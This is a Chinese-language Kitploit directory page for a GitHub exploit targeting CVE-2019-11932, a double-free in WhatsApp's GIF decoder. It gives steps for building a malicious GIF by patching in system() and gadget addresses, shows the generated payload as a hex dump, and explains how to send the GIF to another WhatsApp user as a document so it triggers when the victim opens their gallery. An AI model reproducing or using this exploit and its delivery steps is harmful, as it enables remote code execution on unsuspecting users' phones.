Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-11932-whatsApp-exploit — Double-free vulnerability in DDGifSlurp in decoding.c in libpl_droidsonroids_gif can read more https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/ | Kitploit
工具/GitHubGitHub/mranonymoustz/cve-2019-11932-whatsapp-exploit
Android SecurityPayload GenerationVulnerability AnalysisExploitationMobile SecurityRemote Access TrojanBinary Exploitation
GitHubmranonymoustz/cve-2019-11932-whatsapp-exploit

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-11932-whatsApp-exploit

Double-free vulnerability in DDGifSlurp in decoding.c in libpl_droidsonroids_gif can read more https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/

查看仓库
16556年前尚未审核

CVE-2019-11932-whatsap-exploit

必须将 system() 和 gadget 的地址替换为通过信息泄露漏洞找到的实际地址。

替换 system() 和 gadget 的地址后,运行代码生成恶意的 GIF 文件:

现在开始吧

root@mranonymousTZ:~/root/Desktop/CVE-2019-11932-whatsap-exploit$ chmod +x build.py

root@kitploit:~
root@mranonymousTZ:~/root/Desktop/CVE-2019-11932-whatsap-exploit$ ./build.py
.....
.....
.....
root@mranonymousTZ:~/root/Desktop/CVE-2019-11932-whatsap-exploit$ ./exploit
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B

然后将内容复制到一个 GIF 文件中,并通过 WhatsApp 以文档形式发送给另一个 WhatsApp 用户。注意:不能作为媒体文件发送,否则 WhatsApp 会尝试在发送前将其转换为 MP4。当用户接收到恶意的 GIF 文件后,直到该用户打开 WhatsApp 相册发送媒体文件给朋友时,才会触发恶意行为。

下载工具